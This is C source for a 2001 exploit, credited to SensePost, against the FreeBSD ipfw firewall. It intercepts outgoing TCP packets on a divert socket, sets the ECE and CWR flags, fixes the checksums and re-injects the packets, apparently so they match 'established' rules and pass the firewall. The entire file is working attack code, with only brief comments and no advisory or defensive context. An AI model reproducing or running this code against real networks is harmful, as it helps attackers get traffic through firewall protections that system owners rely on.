/*
 * FreeBSD ipfw + TCP ECE flag exploit.
 * Plathond for Sensepost 2001/01/25
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>

#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <machine/in_cksum.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net/route.h>
#include <arpa/inet.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>

#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <machine/in_cksum.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net/route.h>
#include <arpa/inet.h>

#include <alias.h>
#include <ctype.h>
#include <err.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <unistd.h>
#include <ctype.h>
#include <err.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <unistd.h>

#define DIVERT_PORT 7000
#define FALSE 0
#define TRUE  1

#define CKSUM_CARRY(x) \
    (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff))

typedef unsigned char Boolean;

static unsigned char pbuf[IP_MAXPACKET];
static unsigned long plen = 0;
static int psock = -1;
static struct sockaddr_in paddr;

/* 
 * These are stolen from libnet.
 */
int in_cksum(u_short *addr, int len)
{
  int sum;
  int nleft;
  u_short ans;
  u_short *w;

  sum = 0;
  ans = 0;
  nleft = len;
  w = addr;
   
  while (nleft > 1) {
    sum += *w++;
    nleft -= 2;
  }
  if (nleft == 1) {
    *(u_char *)(&ans) = *(u_char *)w;
    sum += ans;
  }
  return (sum);
}

void do_cksum(unsigned char *buf, int protocol, int len)
{
  struct ip *ip;
  unsigned long ip_hl = 0;
  unsigned long sum = 0;

  ip = (struct ip *)buf;
  ip_hl = ip->ip_hl << 2;
  
  switch(protocol) {
    case IPPROTO_TCP: {
      struct tcphdr *tcp;

      tcp = (struct tcphdr *)(buf + ip_hl);
      tcp->th_sum = 0;
      sum = in_cksum((u_short *)&(ip->ip_src), 8);
      sum += ntohs(IPPROTO_TCP + len);
      sum += in_cksum((u_short *)tcp, len);
      tcp->th_sum = CKSUM_CARRY(sum);
      break;
    }
    default:
      return;
  }
  return;
}

void flushpacket(int fd)
{
  int nR;
  
  nR = sendto(fd, 
              pbuf,
              plen,
              0,
              (struct sockaddr*) &paddr,
              sizeof(paddr));

  if (nR != plen) {
    if (errno == ENOBUFS)
      return;
    if (errno == EMSGSIZE) {
      fprintf(stderr, "Need to implement frag.\n");
      return;
    }
    else {
      fprintf(stderr, "Failed to write packet.\n");
      return;
    }
  }

  psock = -1;
}

void handle_input(int sock)
{
  int nR = 0;
  int addrsize = 0;
  struct ip *ip;
  Boolean fIsOutput = FALSE;
  unsigned int ip_hl = 0, tcp_hl = 0;
  unsigned int ip_data_len = 0;
  struct tcphdr *tcp = NULL;
  

  addrsize = sizeof(struct sockaddr_in);
  nR = recvfrom(sock, 
                pbuf, sizeof(pbuf), 0,
                (struct sockaddr *)&paddr,
                &addrsize);
  if (nR == -1) {
    if (errno != EINTR) 
      fprintf(stderr, "Warning : recvfrom() failed.\n");
    goto over;
  }
  ip = (struct ip *)pbuf;
  ip_hl = ip->ip_hl << 2;
  
  /* Check if this is input or output */
  if (paddr.sin_addr.s_addr == INADDR_ANY)
    fIsOutput = TRUE;
  else
    fIsOutput = FALSE;

  /* We are only handling TCP packets */
  if (ip->ip_p != IPPROTO_TCP)
    goto over;

  /* Get the TCP header */
  tcp = (struct tcphdr *) (pbuf + ip_hl);
  tcp_hl = tcp->th_off << 2;
  ip_data_len = ntohs(ip->ip_len) - ip_hl;
  /* Sanity check packet length */
  if (ip_data_len <= 0)
    goto over;

  /* Add ECE and CWR flags to TCP header */
  tcp->th_flags |= (0x40 | 0x80);
  /* Compute new checksum */
  do_cksum(pbuf, IPPROTO_TCP, ip_data_len);


  /* Write packet back */
  plen = nR;
  psock = sock;
  flushpacket(sock);

  over:
  return;
}

int main(int argc, char **argv)
{
  int inoutsock = -1;
  fd_set rfs, wfs;
  int fdmax = -1;
  struct sockaddr_in addr;
  int rc;

  /* Create divert sockets */
  if ((inoutsock = socket(PF_INET, SOCK_RAW, IPPROTO_DIVERT)) == -1) {
    fprintf(stderr, "socket() failed, exiting\n");
    exit(1);
  }
  /* Bind socket */
  addr.sin_family		= AF_INET;
  addr.sin_addr.s_addr	= INADDR_ANY;
  addr.sin_port		= ntohs(DIVERT_PORT);

  if (bind(inoutsock, 
           (struct sockaddr*) &addr,
           sizeof(struct sockaddr_in)) == -1) {
    fprintf(stderr, "Unable to bind socket, exiting\n");
    exit(1);
  }
  
  while (1) {
    FD_ZERO(&rfs);
    FD_ZERO(&wfs);
    
    if (psock != -1) 
      FD_SET(psock, &wfs);
    FD_SET(inoutsock, &rfs);

    if (inoutsock > psock)
      fdmax = inoutsock;
    else
      fdmax = psock;

    /* Select loop */
    rc = select(fdmax + 1, &rfs, &wfs, NULL, NULL);
    if (rc == -1) {
      if (errno == EINTR)
        continue;
      fprintf(stderr, "select() failed, exiting\n");
      exit(1);
    }
    /* Check for flush from previous packet */
    if (psock != -1) {
      if (FD_ISSET(psock, &wfs))
        flushpacket(psock);
    }
    /* Do we have input available ? */
    if (FD_ISSET(inoutsock, &rfs)) {
      /* Yip, handle it */
      handle_input(inoutsock);
    }
  }
}

/* spidermark sensepostdata ece*/